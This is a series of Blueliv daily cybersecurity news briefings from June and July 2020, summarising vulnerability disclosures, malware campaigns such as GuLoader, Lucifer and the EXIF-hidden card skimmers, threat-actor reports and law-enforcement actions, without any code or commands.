Blueliv Intelligence Briefing

Your cybersecurity news summary

Wednesday,   July 15th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Microsoft patches a 17-year-old “wormable” vulnerability in Windows DNS Server

By exploiting the flaw, "a hacker [can] craft malicious DNS queries to Windows DNS servers, and achieve arbitrary code execution that could lead to the breach of the entire infrastructure," the team says. CVE-2020-1350 affects all Windows Server versions from 2003 to 2019. The vulnerability exists due to how Windows DNS server parses an incoming DNS query, as well as how forwarded DNS queries are handled. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Tuesday,   July 14th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

RECON bug affecting over 40k customers patched

Short for Remotely Exploitable Code On NetWeaver, the vulnerability is rated with a maximum CVSS score of 10 out of 10 and can be exploited remotely by unauthenticated attackers to fully compromise unpatched SAP systems according to the company that found and responsibly disclosed RECON to the SAP Security Response Team. RECON is introduced due to the lack of authentication in an SAP NetWeaver AS for Java web component allowing for several high-privileged activities on the affected SAP system.   Learn more >  

Blueliv Intelligence Briefing

Your cybersecurity news summary

Thursday,   July 9th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

New severe vulnerability adressed by Palo Alto

The CVE-2020-2034 flaw can be exploited by attackers with network access to vulnerable servers, it has been rated as high severity and received a CVSS 3.x base score of 8.1. Experts pointed out that the flaw doesn’t require user interaction to be exploited. “An OS Command Injection vulnerability in the PAN-OS GlobalProtect portal allows an unauthenticated network-based attacker to execute arbitrary OS commands with root privileges.” reads the advisory published by Palo Alto Networks. Learn more >

Code execution vulnerability in GeForce Experience fixed

This week, Nvidia said the security flaw, CVE‑2020‑5964, is found in the service host component of GeForce Experience, "in which the integrity check of application resources may be missed." This failure to verify application resources properly can be used to compromise the software, leading to code execution, denial of service, and information leaks. Issued a severity score of 6.5, the vulnerability impacts all versions of the software on Windows machines prior to version 3.20.4. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Wednesday,   July 8th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Six domains used in phishing scheme seized by Microsoft

US District Court for the Eastern District of Virginia has ruled that the company can seize six domains that were being used in a widespread phishing campaign. Microsoft said the campaign targeted users in sixty-two countries around the world, and it capitalized on fears surrounding COVID-19. Notably, the attackers didn’t use credential-harvesting login portals to trick victims into entering their usernames and passwords. Instead, the emails contained links that requested permissions for a malicious web app that impersonated Office 365. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Tuesday,   July 7th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Credit card skimmer targets ASP.NET sites hosted on Microsoft IIS servers

Most of the targeted websites in the world of digital skimming are built on the LAMP (Linux, Apache, MySQL, and PHP) stack. This is because those technologies are widely adopted, and cyber-criminals usually follow the high return from the least amount of effort rule. Researchers have identified a rare exception, a credit card skimming campaign that exclusively targets websites hosted on Microsoft IIS servers running the ASP.NET web application framework. Learn more >

Microsoft vulnerabilities have been added to the Purple Fox EK

The Purple Fox EK was previously analyzed in September, when researchers said that it appears to have been built to replace the Rig EK in the distribution chain of Purple Fox malware, which is a trojan/rootkit. The latest revision to the exploit kit has added attacks against flaws tracked as CVE-2020-0674 and CVE-2019-1458, which were first disclosed at the end of 2019 and early 2020. Purple Fox previously used exploits targeting older Microsoft flaws, including ones tracked as CVE-2018-8120 and CVE-2015-1701. Learn more >

Android malware distributed via smishing: FakeSpy

The attackers are using smishing to trick victims into installing spoofed apps. “The malware uses smishing, or SMS phishing, to infiltrate target devices, which is a technique that relies on social engineering,” the researchers explain. “The attackers send fake text messages to lure the victims to click on a malicious link. The link directs them to a malicious web page, which prompts them to download an Android application package (APK)... New versions of FakeSpy masquerade as government post office apps and transportation services apps. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Friday,   July 3rd,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Communications system used by criminals to trade drugs and guns “successfully penetrated”

The NCA worked with forces across Europe on the UK's "biggest and most significant" law enforcement operation. Major crime figures were among over 800 Europe-wide arrests after messages on EncroChat were intercepted and decoded. More than two tonnes of drugs, several dozen guns and £54m in suspect cash have been seized, says the NCA. While the NCA was part of the investigation, it was initiated and led by French and Dutch police, and also involved Europol. Learn more >

DarkCrewBot – The Return of the Bot Shop Crew

Researchers recently discovered an ongoing, evolving campaign from a known hackers’ group, “DarkCrewFriends.” This campaign targets PHP servers, focusing on creating a botnet infrastructure that can leverage for several purposes such as monetization and shutting down critical services. DarkCrewFriends has been quite active over the last few years. Learn more >

Connection discovered between Chinese hacker group APT15 and defense contractor

A report details a years-long hacking campaign that has primarily targeted the Uyghur ethnic minority, living in western China, but also the Tibetan community, to a lesser degree. The campaign infected individuals in these communities with malware, allowing government hackers to keep an eye on the activities of minority communities in China's border regions but also living abroad in at least 14 other countries. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Thursday,   July 2nd,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Emergency Firefox update for search issues

After releasing Firefox 78 yesterday, Mozilla quickly halted its rollout via automatic updates due to problems discovered with the built-in search functionality. Today, Mozilla has released a new version 78.0.1 to fix these issues and has resumed auto-updates. In a Mozilla bug, it was reported that numerous search issues occurred after installing Firefox 78. Learn more >

Netgear releases fixes for ten vulnerabilities affecting nearly 80 of its products

Four of flaws have been rated high severity, they can be exploited by an unauthenticated attacker with network access to the vulnerable Netgear device to execute arbitrary code with admin or root privileges, and to bypass authentication. The US Cybersecurity and Infrastructure Security Agency (CISA) published a security alert warning of the Netgear Router flaws. The CERT/CC also published a security advisory related to one of the above vulnerabilities that can be exploited by an unauthenticated attacker to gain remote code execution with root privileges. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Wednesday,   July 1st,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Out-of-band security updates to patch two vulnerabilities in Microsoft Windows

The two vulnerabilities are tracked as CVE-2020-1425 and CVE-2020-1457, the first one being rated as critical while the second received an important severity rating. In both cases, the remote code execution issue is caused by the way that Microsoft Windows Codecs Library handles objects in memory. After successfully exploiting CVE-2020-1425, attackers "could obtain information to further compromise the user’s system," while successful exploitation of CVE-2020-1457 could lead to arbitrary code execution on vulnerable systems. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Tuesday,   June 30th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

PROMETHIUM extends global reach with StrongPity3 APT

The PROMETHIUM threat actor — active since 2012 — has been exposed multiple times over the past several years. However, this has not deterred this actor from continuing and expanding their activities. By matching indicators such as code similarity, command and control (C2) paths, toolkit structure and malicious behavior, a research team has identified around 30 new C2 domains. They assess that PROMETHIUM activity corresponds to five peaks of activity when clustered by the creation date month and year. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Monday,   June 29th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Almost 300 Windows 10 executables vulnerable to DLL hijacking

A simple VBScript may be enough to allow users to gain administrative privileges and bypass UAC entirely on Windows 10. In a new report from a PwC UK security researcher Wietze Beukema, we learn that almost 300 Windows 10 executables are vulnerable to DLL hijacking. It turns out nearly 300 executables in your System32 folder are vulnerable to relative path DLL Hijacking. Did you know that with a simple VBScript some of these EXEs can be used to elevate such executions, bypassing UAC entirely?   Learn more >  

Blueliv Intelligence Briefing

Your cybersecurity news summary

Friday,   June 26th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

GuLoader: Peering Into a Shellcode-based Downloader

GuLoader, a malware family that emerged in the wild late last year, is written in Visual Basic 6 (VB6), which is just a wrapper for a core payload that is implemented as a shellcode. It is distributed via spam email campaigns with archived attachments that contain the malware. The majority of malware downloaded by GuLoader is commodity malware, with AgentTesla, FormBook, and NanoCore being the most predominant. This downloader typically stores its encrypted payloads on Google Drive.   Learn more >  

Hackers hide credit card stealing scripts in favicon EXIF data

Hackers are always evolving their tactics to stay one step ahead of security companies. A perfect example of this is the hiding of malicious credit card stealing scripts in the EXIF data of a favicon image to evade detection. In a new report by Malwarebytes, an online store using the WordPress WooCommerce plugin was found to be infected with a Magecart script to steal customer's credit cards. What made this attack stand out was that the scripts used to capture data from payment forms were not added directly to the site but were contained in the EXIF data for a remote site's favicon image.   Learn more >  

Web skimmer hides within EXIF metadata, exfiltrates credit cards via image files

They say a picture is worth a thousand words. Threat actors must have remembered that as they devised yet another way to hide their credit card skimmer in order to evade detection. Researchers found skimming code hidden within the metadata of an image file (a form of steganography) and surreptitiously loaded by compromised online stores. This scheme would not be complete without yet another variation to exfiltrate stolen credit card data.   Learn more >  

Blueliv Intelligence Briefing

Your cybersecurity news summary

Thursday,   June 25th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices

New variant of powerful cryptojacking and DDoS-based malware is exploiting severe vulnerabilities in order to infect Windows machines. Dubbed Lucifer, the malware is part of an active campaign against Windows hosts and uses a variety of weaponized exploits in the latest wave of attacks, Palo Alto Networks' Unit 42 said on Wednesday.   Learn more >  

CryptoCore A Threat Actor Targeting Cryptocurrency Exchanges

A hacking group known as CryptoCore has pulled off cryptocurrency heists worth $70 million, but research indicates that it may be an estimated value of over $200 million since 2018. This group targets cryptocurrency exchanges by conducting spear-phishing campaigns against employees and executives. The main goal of CryptoCore’s heists is to gain access to cryptocurrency exchanges’ wallets, be it general corporate wallets or wallets belonging to the exchange’s employees.   Learn more >  

New ransomware posing as COVID‑19 tracing app targets Canada

New ransomware CryCryptor has been targeting Android users in Canada, distributed via two websites under the guise of an official COVID-19 tracing app provided by Health Canada. ESET researchers analyzed the ransomware and created a decryption tool for the victims. CryCryptor surfaced just a few days after the Canadian government officially announced its intention to back the development of a nation-wide, voluntary tracing app called COVID Alert.   Learn more >  

Blueliv Intelligence Briefing

Your cybersecurity news summary

Tuesday,   June 23rd,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Inside a TrickBot Cobalt Strike Attack Server

TrickBot is the successor of Dyre that, at first, was primarily focused on banking fraud, even reusing the same web-injection systems utilized by Dyre. TrickBot has since shifted focus to enterprise environments over the years, incorporating network profiling, mass data collection, and lateral traversal exploits. This focus shift is prevalent in their tertiary deliveries that target enterprise environments. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Monday,   June 22nd,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Dark Basin Uncovering a Massive Hack-For-Hire Operation

Researchers give the name Dark Basin to a hack-for-hire organization that has targeted thousands of individuals and organizations on six continents, including senior politicians, government prosecutors, CEOs, journalists, and human rights defenders. With high confidence, we link Dark Basin to BellTroX InfoTech Services, an India-based technology company. Over the course of researchers' multi-year investigation, they found that Dark Basin likely conducted commercial espionage on behalf of their clients against opponents involved in high profile public events, criminal cases, financial transactions, news stories, and advocacy.   Learn more >  

Malwarebytes causing performance issues in Windows 10 2004

Since the release of Windows 10 2004, users have been reporting performance issues and crashes when Malwarebytes 4.1 is installed. In numerous reports to the Malwarebytes support forums since Windows 10 version 2004, the May 2020 Update, was released, users are reporting many problems with MBAM 4.1 installed. These issues range from random freezes, general slowness, video stuttering, blue screen of death crashes (BSOD), or Windows 10 becoming unresponsive.   Learn more >